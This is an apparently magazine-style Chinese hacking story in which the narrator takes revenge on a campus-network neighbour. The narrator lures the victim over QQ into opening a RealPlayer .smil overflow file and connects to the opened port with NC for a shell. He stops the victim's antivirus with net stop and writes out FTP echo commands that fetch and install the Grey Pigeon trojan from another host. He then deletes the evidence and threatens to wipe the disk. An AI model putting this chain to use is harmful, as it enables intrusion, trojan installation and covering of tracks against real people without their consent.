幻想凡神 不凡的黑客幻想

　　上次说到黑不凡享受了美色大餐，还做了回无名英雄，不凡心里别提有多高兴！可这股高兴劲很快就被冲散了。怎么回事？难道有人敢在不凡的头上动刀？欲知详情，往下面瞧瞧吧！ 　　今晚偶异常兴奋，why？你说当青蛙遭遇白雪公主的电击，后果会是如何？这不，我和高中时的班花正聊得不亦乐乎。可半路杀出个程咬金！不知谁老是和我IP冲突。这人咋就不听严守一大哥的劝呢？做人要厚道嘛。我的校园网里的IP没有绑定，可以随意换，好不容易找到了一个空IP，可班花早已悄悄离去。Oh,my god！偶悲痛不已，惟有一句: 此仇不报非君子！
　　
　　溢出一部曲　诱惑的就是你
　　
　　要溢出必须先找到合适的漏洞，大多数溢出攻击都拜微软所赐，我立马到微软看看安全公告，没有什么合适的。再到论坛泡泡，看看一些热门的溢出漏洞，发现RealPlayer的.smil溢出漏洞很是火爆，几乎覆盖了所有版本，加之我所在的局域网根本就无法连上Real的服务器更新，想必成功率会很高。
　　此溢出漏洞的制作工具为real.exe，在DOS环境下输入“real.exe *.smil”，就可生成含有溢出代码的smil格式视频文件（图1）。
　　有了溢出攻击的工具，再来就是看看是谁在害我了，我用《网络执法官》查看局域网，根据经验确定了对方的IP。接着就要诱骗对方看看这激情视频了。嘿嘿……这可以我的拿手好戏。用QQSniffer嗅探对方IP上运行的QQ，自称校友加好友，极尽本人诱惑之能事，看看你是不是个好色之徒！由于这是个视频文件，QQ安全中心不会阻止，也不是.exe可执行扩展名，绝对足以击垮对方的心理防线。这不，我的鱼儿上钩了（图2）。
　　
　　溢出二部曲　瑞士军刀出击入侵任我行
　　
　　对方一旦播放smil视频就会打开13579端口，这就是我打入其内部的入口。有了端口，还得有好的端口入侵工具。有着“瑞士军刀”美誉的NC就可担此重任。
　　OK！远程入侵正式开始。打开DOS窗口，运行“NC 218.197.110.242 13579”（图3）。这样就得到了对方的SHELL，具有读写的权限。哈哈……下一步该怎么做呢？当然是种马啦！唉，不急，还没把对方的防火墙和杀毒软件干掉，怎么能贸然种马呢？
　　在刚刚连接的SHELL中输入“net start”查看对方开启的服务。大势不妙，对方装有杀毒软件。这可如何是好？停了不就得了。用“net stop”命令将它们干掉（图4）。好了，扫清了障碍，激动人心的时刻到来了！我就要种马了。
　　小知识
　　溢出攻击
　　打个比方：水装在杯子里，杯子的容量有限，水多了就会溢出。同样，计算机里的数据是装在缓冲区里的，多了也会溢出。一旦溢出就可以执行任意代码。例如溢出的数据是“ne tuser 1234 123/add”这样的指令，就可以轻而易举地获取远程管理权限。一般溢出攻击会达到这样一个目的：远程执行指令，返回一个SHELL，开个后门端口，获取一定的权限。例如本文中的.smil溢出漏洞就可以打开对方的13579端口。
　　点评:黑客兵器谱之瑞士军刀。有人因为其不是图形界面而鄙视之，孰不知：古有“为人不识陈近南，便称英雄也枉然”，在黑客圈子里，如果你不知道NC，那就愧对“黑客”二字了。端口扫描，反向连接，数据抓包都是NC的拿手好戏。反向连接更是可以穿过防火墙，乃溢出攻击的最佳拍档。本文中仅展示了NC远程连接这个最基本的功能，有兴趣的读者可以深入研究，必定受益匪浅！
　　
　　溢出攻击三部曲　FTP种马　爽就一个字
　　种马的方式多种多样，FTP种马较为方便快捷，类似批处理文件，成功率比较高。哈哈……，深吸一口气，我来种马也！在打开的SHELL中依次输入如下命令
　　echo open 218.197.110.133 > ftp.txt /连接FTP服务器/
　　echo seapig >> ftp.txt /登录FTP服务器的账号和密码/
　　echo seapig >> ftp.txt
　　echo get help.exe >> ftp.txt /下载木马服务端，此乃我养的灰鸽子/
　　echo bye >> ftp.txt /断开FTP/
　　ftp s:ftp.txt /执行生成的ftp.txt/
　　返回结果后，就这样我的灰鸽子在对方的电脑里算是安家了（图5）。运行木马客户端，等着鱼儿上钩吧。下面的时间该清理一下战场了，删除ftp.txt作案证据。
　　哈哈……鱼儿上钩了！不知怎么回事，刚刚那股恶气没有了，现在只是精神亢奋而已。本来想好好教训一下这个破坏偶好事的人，现在心情比较High，来个黄牌警告算了。用灰鸽子给他带去口信：这位仁兄，你可知你坏了我的好事，终生幸福就这样给你毁了！没事别用网管工具攻击人家的IP！做人厚道点嘛。这次黄牌警告一下，下次可就要格硬盘了哦。
　　陶醉于成功入侵的喜悦中，突然QQ有系统消息：这位黑哥，小弟愿拜你为师。如果你不加小弟为好友，我会炮轰你的QQ的。我闪……
　　提示
　　1 .文中的远程连接也可用telne t 命令代替，但成功率较低。
　　2 .此溢出攻击的关键在于速度。因为对方打开smil视频后会造成假死现象，如果通过任务管理器将其中止，那13579端口也会随之关闭，入侵就会受阻。所以建议将FTP种马的命令先放在记事本里，再粘贴输入。
　　不凡感想　黑客的境界
　　俗话说：明枪易躲，暗箭难防。黑客的最高境界不在于攻，而在于防。技术是一种思想，高手是一种境界，而黑客则是一种精神，已脱离了技术层面，升华到思想与境界。防御一个攻击要比入侵攻击艰难，发现一个漏洞要比利用一个漏洞更有成就感！逐步走向黑客的最高境界，你会有这样一个感觉：如果发现一个漏洞是源自灵感，那你希望发现下一个漏洞是源自技术，直到源自感觉！
　　本文中所涉及到的图表、注解、公式等内容请以PDF格式阅读原文。 本文为全文原貌 未安装PDF浏览器用户请先下载安装 原版全文